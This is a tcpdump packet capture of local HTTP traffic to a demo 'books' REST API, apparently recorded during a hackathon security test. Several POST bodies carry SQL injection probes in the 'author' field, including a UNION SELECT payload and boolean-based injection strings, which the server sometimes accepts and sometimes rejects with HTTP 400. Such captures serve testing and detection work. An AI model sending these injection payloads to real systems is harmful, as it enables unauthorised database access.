21:31:01.000123 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.54482 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0x7487), seq 1:218, ack 1, win 342, options [nop,nop,TS val 6881264 ecr 6881264], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
21:31:01.000148 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54482: Flags [.], cksum 0x0028 (incorrect -> 0x4fc1), seq 1, ack 218, win 350, options [nop,nop,TS val 6881264 ecr 6881264], length 0
21:31:01.003544 IP6 (hlim 64, next-header TCP (6) payload length: 254) ::1.8080 > ::1.54482: Flags [P.], cksum 0x0106 (incorrect -> 0xdb3d), seq 1:223, ack 218, win 350, options [nop,nop,TS val 6881267 ecr 6881264], length 222: HTTP, length: 222
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	58
	{"id":12,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
21:31:01.003564 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4edd), seq 218, ack 223, win 350, options [nop,nop,TS val 6881267 ecr 6881267], length 0
21:31:01.004457 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54482: Flags [P.], cksum 0x002d (incorrect -> 0x0ab5), seq 223:228, ack 218, win 350, options [nop,nop,TS val 6881268 ecr 6881267], length 5: HTTP
21:31:01.004476 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4ed6), seq 218, ack 228, win 350, options [nop,nop,TS val 6881268 ecr 6881268], length 0
21:31:01.004779 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54482 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4ed5), seq 218, ack 228, win 350, options [nop,nop,TS val 6881268 ecr 6881268], length 0
21:31:01.006085 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54482: Flags [F.], cksum 0x0028 (incorrect -> 0x4ed2), seq 228, ack 219, win 350, options [nop,nop,TS val 6881270 ecr 6881268], length 0
21:31:01.006104 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4ed0), seq 219, ack 229, win 350, options [nop,nop,TS val 6881270 ecr 6881270], length 0
21:31:01.015535 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54484 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xb0fe), seq 1248375567, win 43690, options [mss 65476,sackOK,TS val 6881279 ecr 0,nop,wscale 7], length 0
21:31:01.015559 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54484: Flags [S.], cksum 0x0030 (incorrect -> 0xdd95), seq 2265074669, ack 1248375568, win 43690, options [mss 65476,sackOK,TS val 6881279 ecr 6881279,nop,wscale 7], length 0
21:31:01.015577 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xafc7), seq 1, ack 1, win 342, options [nop,nop,TS val 6881279 ecr 6881279], length 0
21:31:01.015662 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54484 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xab74), seq 1:197, ack 1, win 342, options [nop,nop,TS val 6881279 ecr 6881279], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
21:31:01.015676 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54484: Flags [.], cksum 0x0028 (incorrect -> 0xaefb), seq 1, ack 197, win 350, options [nop,nop,TS val 6881279 ecr 6881279], length 0
21:31:01.018049 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54484: Flags [P.], cksum 0x00f1 (incorrect -> 0xd97a), seq 1:202, ack 197, win 350, options [nop,nop,TS val 6881282 ecr 6881279], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	43
	{"id":13,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
21:31:01.018075 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xae2c), seq 197, ack 202, win 350, options [nop,nop,TS val 6881282 ecr 6881282], length 0
21:31:01.018387 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54484: Flags [P.], cksum 0x002d (incorrect -> 0x6a05), seq 202:207, ack 197, win 350, options [nop,nop,TS val 6881282 ecr 6881282], length 5: HTTP
21:31:01.018407 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xae27), seq 197, ack 207, win 350, options [nop,nop,TS val 6881282 ecr 6881282], length 0
21:31:01.018802 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54484 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xae26), seq 197, ack 207, win 350, options [nop,nop,TS val 6881282 ecr 6881282], length 0
21:31:01.019362 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54484: Flags [F.], cksum 0x0028 (incorrect -> 0xae24), seq 207, ack 198, win 350, options [nop,nop,TS val 6881283 ecr 6881282], length 0
21:31:01.019380 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xae23), seq 198, ack 208, win 350, options [nop,nop,TS val 6881283 ecr 6881283], length 0
21:31:01.028962 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54486 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x57b1), seq 2574957882, win 43690, options [mss 65476,sackOK,TS val 6881293 ecr 0,nop,wscale 7], length 0
21:31:01.028986 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54486: Flags [S.], cksum 0x0030 (incorrect -> 0xeceb), seq 3224480268, ack 2574957883, win 43690, options [mss 65476,sackOK,TS val 6881293 ecr 6881293,nop,wscale 7], length 0
21:31:01.029002 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54486 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbf1d), seq 1, ack 1, win 342, options [nop,nop,TS val 6881293 ecr 6881293], length 0
21:31:01.029088 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.54486 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0x0080), seq 1:229, ack 1, win 342, options [nop,nop,TS val 6881293 ecr 6881293], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
21:31:01.029101 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54486: Flags [.], cksum 0x0028 (incorrect -> 0xbe31), seq 1, ack 229, win 350, options [nop,nop,TS val 6881293 ecr 6881293], length 0
21:31:01.033417 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54486: Flags [P.], cksum 0x0084 (incorrect -> 0x6f8b), seq 1:93, ack 229, win 350, options [nop,nop,TS val 6881297 ecr 6881293], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	Connection: close
	
21:31:01.033442 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54486 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbdd5), seq 229, ack 93, win 342, options [nop,nop,TS val 6881297 ecr 6881297], length 0
21:31:01.033556 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54486: Flags [F.], cksum 0x0028 (incorrect -> 0xbdcc), seq 93, ack 229, win 350, options [nop,nop,TS val 6881297 ecr 6881297], length 0
21:31:01.036187 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54486 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xbdd0), seq 229, ack 94, win 342, options [nop,nop,TS val 6881300 ecr 6881297], length 0
21:31:01.036205 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54486: Flags [.], cksum 0x0028 (incorrect -> 0xbdc5), seq 94, ack 230, win 350, options [nop,nop,TS val 6881300 ecr 6881300], length 0
21:31:01.048297 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54488 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x4516), seq 3450968969, win 43690, options [mss 65476,sackOK,TS val 6881312 ecr 0,nop,wscale 7], length 0
21:31:01.048319 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54488: Flags [S.], cksum 0x0030 (incorrect -> 0xebd9), seq 2673064270, ack 3450968970, win 43690, options [mss 65476,sackOK,TS val 6881312 ecr 6881312,nop,wscale 7], length 0
21:31:01.048337 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54488 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbe0b), seq 1, ack 1, win 342, options [nop,nop,TS val 6881312 ecr 6881312], length 0
21:31:01.048416 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.54488 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0xbd89), seq 1:198, ack 1, win 342, options [nop,nop,TS val 6881312 ecr 6881312], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
21:31:01.048429 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54488: Flags [.], cksum 0x0028 (incorrect -> 0xbd3e), seq 1, ack 198, win 350, options [nop,nop,TS val 6881312 ecr 6881312], length 0
21:31:01.053088 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54488: Flags [P.], cksum 0x00f2 (incorrect -> 0xccaa), seq 1:203, ack 198, win 350, options [nop,nop,TS val 6881317 ecr 6881312], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	44
	{"id":14,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
21:31:01.053103 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54488 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbc6a), seq 198, ack 203, win 350, options [nop,nop,TS val 6881317 ecr 6881317], length 0
21:31:01.053329 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54488: Flags [P.], cksum 0x002d (incorrect -> 0x7843), seq 203:208, ack 198, win 350, options [nop,nop,TS val 6881317 ecr 6881317], length 5: HTTP
21:31:01.053343 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54488 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbc65), seq 198, ack 208, win 350, options [nop,nop,TS val 6881317 ecr 6881317], length 0
21:31:01.053714 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54488 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xbc64), seq 198, ack 208, win 350, options [nop,nop,TS val 6881317 ecr 6881317], length 0
21:31:01.055634 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54488: Flags [F.], cksum 0x0028 (incorrect -> 0xbc61), seq 208, ack 199, win 350, options [nop,nop,TS val 6881319 ecr 6881317], length 0
21:31:01.055650 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54488 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbc5f), seq 199, ack 209, win 350, options [nop,nop,TS val 6881319 ecr 6881319], length 0
21:31:01.065072 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54490 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xd8f3), seq 493402082, win 43690, options [mss 65476,sackOK,TS val 6881329 ecr 0,nop,wscale 7], length 0
21:31:01.065122 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54490: Flags [S.], cksum 0x0030 (incorrect -> 0x7a0b), seq 4128139310, ack 493402083, win 43690, options [mss 65476,sackOK,TS val 6881329 ecr 6881329,nop,wscale 7], length 0
21:31:01.065177 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54490 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4c3d), seq 1, ack 1, win 342, options [nop,nop,TS val 6881329 ecr 6881329], length 0
21:31:01.065321 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.54490 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0x3520), seq 1:228, ack 1, win 342, options [nop,nop,TS val 6881329 ecr 6881329], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
21:31:01.065342 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54490: Flags [.], cksum 0x0028 (incorrect -> 0x4b52), seq 1, ack 228, win 350, options [nop,nop,TS val 6881329 ecr 6881329], length 0
21:31:01.067335 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54490: Flags [P.], cksum 0x0084 (incorrect -> 0xfcad), seq 1:93, ack 228, win 350, options [nop,nop,TS val 6881331 ecr 6881329], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	Connection: close
	
